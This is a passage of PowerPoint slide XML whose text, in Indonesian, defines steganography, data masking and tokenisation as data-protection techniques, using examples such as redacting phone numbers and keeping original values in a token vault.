            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dokumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penampung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dokumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penampung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>covertext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disematkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disangkal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicetak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konteksnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penyembunyian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>isi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disunting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "x", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disunting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> metadata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nomor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telepon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panggilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nomor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disunting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyembunyian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Tokenisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>acak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di server token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>brankas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kueri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diotorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>brankas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tokenisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
